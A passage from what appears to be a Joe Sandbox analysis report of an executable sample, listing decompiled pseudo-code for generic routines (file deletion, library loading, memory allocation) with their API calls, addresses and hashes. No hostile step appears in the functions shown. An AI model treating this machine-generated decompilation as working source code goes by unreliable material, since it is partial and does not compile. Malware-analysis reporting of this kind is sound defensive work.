					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                                                                            0x00427155
                                                                                                                            0x00427157
                                                                                                                            0x0042716c
                                                                                                                            0x00427177
                                                                                                                            0x00427178
                                                                                                                            0x0042717d
                                                                                                                            0x00427180
                                                                                                                            0x0042718b
                                                                                                                            0x00427190
                                                                                                                            0x00427198
                                                                                                                            0x0042719d
                                                                                                                            0x004271a0
                                                                                                                            0x004271a3
                                                                                                                            0x004271b0
                                                                                                                            0x0042716e
                                                                                                                            0x00427170
                                                                                                                            0x004271c9
                                                                                                                            0x004271c9

                                                                                                                            APIs
                                                                                                                            • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2018770650-0
                                                                                                                            • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                                                            • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                                                                                            • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                                                            • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00421230 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                                                                            0x00421231
                                                                                                                            0x00421233
                                                                                                                            0x00421237
                                                                                                                            0x0042123a
                                                                                                                            0x0042123f
                                                                                                                            0x00421244
                                                                                                                            0x00421245
                                                                                                                            0x0042124a
                                                                                                                            0x0042124d
                                                                                                                            0x00421250
                                                                                                                            0x00421255
                                                                                                                            0x00421256
                                                                                                                            0x0042125b
                                                                                                                            0x0042125e
                                                                                                                            0x00421269
                                                                                                                            0x0042126e
                                                                                                                            0x00421273
                                                                                                                            0x00421276
                                                                                                                            0x00421279
                                                                                                                            0x0042127e
                                                                                                                            0x00421280
                                                                                                                            0x00421283

                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32 ref: 0042123A
                                                                                                                            • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2987862817-0
                                                                                                                            • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                                                            • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                                                                                            • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                                                            • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004052D4 Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                                                                                            0x004052e2
                                                                                                                            0x004052f9
                                                                                                                            0x004052e7
                                                                                                                            0x004052f2
                                                                                                                            0x004052f7
                                                                                                                            0x004052f7
                                                                                                                            0x004052fd
                                                                                                                            0x00405302
                                                                                                                            0x00405307
                                                                                                                            0x00405309
                                                                                                                            0x0040530e
                                                                                                                            0x00405311
                                                                                                                            0x0040531a
                                                                                                                            0x0040531d
                                                                                                                            0x00405320
                                                                                                                            0x00405320
                                                                                                                            0x00405323
                                                                                                                            0x00405325
                                                                                                                            0x00405328
                                                                                                                            0x0040532d
                                                                                                                            0x00405332
                                                                                                                            0x00405332
                                                                                                                            0x00405334
                                                                                                                            0x00405336
                                                                                                                            0x00405336
                                                                                                                            0x00405339
                                                                                                                            0x0040533c
                                                                                                                            0x0040533c
                                                                                                                            0x00405341
                                                                                                                            0x00405352
                                                                                                                            0x00405357
                                                                                                                            0x00405359
                                                                                                                            0x0040535e
                                                                                                                            0x00405375
                                                                                                                            0x00405363
                                                                                                                            0x0040536e
                                                                                                                            0x00405373
                                                                                                                            0x00405373
                                                                                                                            0x00405379
                                                                                                                            0x0040537b
                                                                                                                            0x00405382

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                                                                                            • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                                                            • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                                                                                            • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                                                            • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004232EC Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                                                                                            0x004232f3
                                                                                                                            0x0042330b
                                                                                                                            0x00423313
                                                                                                                            0x00423317
                                                                                                                            0x00423320
                                                                                                                            0x00423312
                                                                                                                            0x00423312
                                                                                                                            0x00423312
                                                                                                                            0x00000000
                                                                                                                            0x00423322
                                                                                                                            0x00423322
                                                                                                                            0x00423326
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00423326
                                                                                                                            0x00000000
                                                                                                                            0x00423320
                                                                                                                            0x00423339

                                                                                                                            APIs
                                                                                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FormatMessage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1306739567-0
                                                                                                                            • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                                                            • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                                                                                            • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                                                            • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00422A18 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 31%
                                                                                                                            			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                                                                                            0x00422a1b
                                                                                                                            0x00422a22
                                                                                                                            0x00422a23
                                                                                                                            0x00422a28
                                                                                                                            0x00422a2b
                                                                                                                            0x00422a33
                                                                                                                            0x00422a41
                                                                                                                            0x00422a4a
                                                                                                                            0x00422a4d
                                                                                                                            0x00422a50
                                                                                                                            0x00422a5d

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                                                            • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                                                                            • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                                                            • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423DA8 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                                                                                            0x00423de5
                                                                                                                            0x00423ded

                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                                                            • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                                                                            • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                                                            • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409FA8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                                                                            0x00409fb0
                                                                                                                            0x00409fb2
                                                                                                                            0x00409fb6
                                                                                                                            0x00409fc6
                                                                                                                            0x00409fcf
                                                                                                                            0x00409fd4
                                                                                                                            0x00409fd6
                                                                                                                            0x00409fdb
                                                                                                                            0x00409fe0
                                                                                                                            0x00409fe0
                                                                                                                            0x00409fdb
                                                                                                                            0x00409fee

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                                                                              • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                                                              • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName$LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4113206344-0
                                                                                                                            • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                                                            • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                                                                            • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                                                            • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423ED8 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                                                                                            0x00423ed9
                                                                                                                            0x00423edf
                                                                                                                            0x00423ee6
                                                                                                                            0x00000000
                                                                                                                            0x00423eea
                                                                                                                            0x00423ef0

                                                                                                                            APIs
                                                                                                                            • SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF
                                                                                                                              • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 734332943-0
                                                                                                                            • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                                                            • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                                                                            • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                                                            • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040CAA4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                                                                                            0x0040caa8
                                                                                                                            0x0040cab4

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 31276548-0
                                                                                                                            • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                                                            • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                                                                            • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                                                            • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403BCC Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                                                                            0x00403bce
                                                                                                                            0x00403bd0
                                                                                                                            0x00403be3
                                                                                                                            0x00403bea
                                                                                                                            0x00403c3c
                                                                                                                            0x00403c45
                                                                                                                            0x00403bec
                                                                                                                            0x00403bec
                                                                                                                            0x00403bf2
                                                                                                                            0x00403bf4
                                                                                                                            0x00403bfa
                                                                                                                            0x00403bff
                                                                                                                            0x00403c02
                                                                                                                            0x00403c06
                                                                                                                            0x00403c11
                                                                                                                            0x00403c1e
                                                                                                                            0x00403c26
                                                                                                                            0x00403c28
                                                                                                                            0x00403c35
                                                                                                                            0x00403c39
                                                                                                                            0x00403c39

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
